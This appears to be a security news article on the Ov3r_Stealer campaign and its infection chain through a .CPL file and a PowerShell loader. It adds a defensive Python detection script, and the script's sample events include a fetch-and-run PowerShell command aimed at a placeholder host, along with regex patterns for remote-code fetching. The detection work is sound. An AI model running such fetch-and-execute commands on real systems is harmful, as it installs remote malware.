Threat actors have initiated a campaign using deceptive Facebook job advertisements to propagate a new Windows-based malware named Ov3r_Stealer. This malicious software, as identified by Trustwave SpiderLabs, specializes in extracting credentials and cryptocurrency wallets, forwarding the data to a monitored Telegram channel. Capable of pilfering an array of sensitive information including IP addresses, passwords, credit card details, and Microsoft Office documents, Ov3r_Stealer poses a significant threat to unsuspecting users.
The attack methodology commences with a weaponized PDF file, presented as a OneDrive document, luring users to click on a concealed “Access Document” button. Subsequently, users are directed to an internet shortcut (.URL) file masquerading as a DocuSign document hosted on Discord’s content delivery network. Upon execution, the .URL file initiates the delivery of a control panel item (.CPL) file, which is executed using the Windows Control Panel process binary (“control.exe”). This execution path culminates in the launch of Ov3r_Stealer via a PowerShell loader retrieved from a GitHub repository.
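As an added defender-side example (not from Trustwave's report or the campaign's own tooling), the script below flags the two process-level stages of the chain above in constructed, Sysmon-style process-creation records: control.exe opening a .CPL from outside the Windows directory, and a network-fetching PowerShell spawned under the CPL host. The record field names, the sample events, and the assumption that control.exe hands CPL files to rundll32.exe are mine.

```python
import re
from typing import Dict, Iterable, List

# Windows system directory prefix: a CPL loaded from anywhere else is unusual.
SYSTEM_DIRS = re.compile(r"^[a-z]:\\windows\\", re.IGNORECASE)
CPL_ARG = re.compile(r"(\S+\.cpl)\b", re.IGNORECASE)
POWERSHELL = re.compile(r"\\(powershell|pwsh)\.exe$", re.IGNORECASE)
REMOTE_FETCH = re.compile(r"invoke-webrequest|\biwr\b|downloadstring|invoke-expression|\biex\b", re.IGNORECASE)

def detect(events: Iterable[Dict[str, str]]) -> List[str]:
    """Return one finding per event matching the .CPL -> PowerShell stages."""
    findings = []
    for ev in events:
        image = ev.get("image", "")
        cmd = ev.get("command_line", "")
        parent = ev.get("parent_image", "")
        # Stage: control.exe asked to open a .CPL that lives outside %WINDIR%
        # (the campaign's CPL arrives via a .URL shortcut, so it sits in a user path).
        if image.lower().endswith("\\control.exe"):
            m = CPL_ARG.search(cmd)
            if m and not SYSTEM_DIRS.match(m.group(1).strip('"')):
                findings.append(f"control.exe loading non-system CPL: {m.group(1)}")
        # Stage: PowerShell that pulls code from the network, spawned by the CPL host.
        # Assumption: control.exe hands CPLs to rundll32.exe, so either may be the parent.
        pname = parent.rsplit("\\", 1)[-1].lower()
        if POWERSHELL.search(image) and pname in ("control.exe", "rundll32.exe") and REMOTE_FETCH.search(cmd):
            findings.append(f"remote-fetching PowerShell under {pname}: {cmd[:70]}")
    return findings

# Constructed sample events (simplified Sysmon-style process-creation records).
SAMPLE_EVENTS = [
    {"image": r"C:\Windows\System32\control.exe",               # benign: regional settings applet
     "command_line": r'"C:\Windows\System32\control.exe" C:\Windows\System32\intl.cpl',
     "parent_image": r"C:\Windows\explorer.exe"},
    {"image": r"C:\Windows\System32\control.exe",               # suspicious: CPL in a user path
     "command_line": r'"C:\Windows\System32\control.exe" C:\Users\victim\Downloads\DocuSign_contract.cpl',
     "parent_image": r"C:\Windows\explorer.exe"},
    {"image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "command_line": 'powershell -nop -w hidden -c "iex (iwr https://PLACEHOLDER-HOST/loader.ps1)"',
     "parent_image": r"C:\Windows\System32\rundll32.exe"},     # loader stage under the CPL host
]

def run_sample() -> List[str]:
    return detect(SAMPLE_EVENTS)

if __name__ == "__main__":
    for finding in run_sample():
        print(finding)
```

The benign intl.cpl event produces no finding, so the rule keys on the load path rather than on control.exe itself.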
Notably, the campaign bears striking similarities to a previous attack detailed by Trend Micro, involving another stealer known as Phemedrone Stealer. Both malware variants share code-level overlaps and leverage similar infection chains, hinting at potential rebranding or repurposing by threat actors. Additionally, the cybercriminal behind Ov3r_Stealer has been observed promoting their malware on Telegram channels, aiming to establish credibility within the malware-as-a-service (MaaS) landscape. These findings underscore the growing sophistication and diversification of cyber threats, necessitating enhanced vigilance and proactive security measures among organizations and individuals alike.